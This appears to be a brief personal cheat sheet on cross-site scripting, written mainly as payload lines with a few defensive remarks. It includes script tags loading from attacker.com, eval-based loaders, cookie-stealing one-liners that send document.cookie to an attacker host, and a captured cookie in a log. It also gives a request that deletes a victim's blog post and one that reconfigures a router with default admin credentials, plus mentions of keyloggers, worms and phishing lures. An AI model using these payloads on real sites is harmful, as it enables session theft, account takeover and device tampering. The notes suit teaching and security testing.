██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝

XSS vulnerabilities

  • echo $_GET['param'];
  • XSS
  • title tag XSS
  • Visit http://site.com/?param=<script src='http://attacker.com/1.js'></script>
  • innerHTML v-html
  • document.body.innerHTML="<script>alert(1)</script>" // JS does not execute
    document.body.innerHTML="<img src='x' onerror='alert(1)'>" // JS executes
    
  • eval == evil
  • tunnel.html
    <body><script>eval(unescape(atob(location.search.slice(1))))</script></body>
    ...
    '/tunnel.html?'+btoa(escape(jscode))
    

    XSS exploitation - Stealing

  • new Image().src="https://attacker.com/?cookie="+escape(document.cookie)
  • var script = document.createElement('script');script.src="https://attacker.com/?cookie="+escape(document.cookie);document.body.append(script)
  • fetch('https://attacker.com/?cookie='+document.cookie)
  • # tail -f mb_accesslog
    45.33.104.18 - - [09/Mar/2020:22:12:29 +0800] "GET /?cookie=BIDUPSID=4B3A1F21C50AA81B...omitted...BD_HOME=1 HTTP/1.1" 301 5 "https://www.baidu.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36"
    
  • document.cookie [set the cookie HttpOnly so JS cannot read it]
  • document.body.innerText
  • IP geo agent Info
  • Keylogger Script
  • Killing with a borrowed knife

  • Lure the victim into clicking through social engineering; depends on the victim's environment
  • new Image().src="http://www.victim-sns.com/del_post?id=33456" deletes a blog post [needs a hash/token check]
  • <img src="http://192.168.1.1/userPpm/ManageControlRpm.html?port=80&ip=255.255.255.255&Save=%B1%A3+%B4%E6"> default username and password of the FAST wireless router's web management: admin
  • Weibo XSS Worm
  • Phishing

  • Guangdong people drink (baby) soup just for virility [shocking news]
  • Handing out red packets
  • Impersonation

  • clickjacking
  • SINCE 2018 © markbuild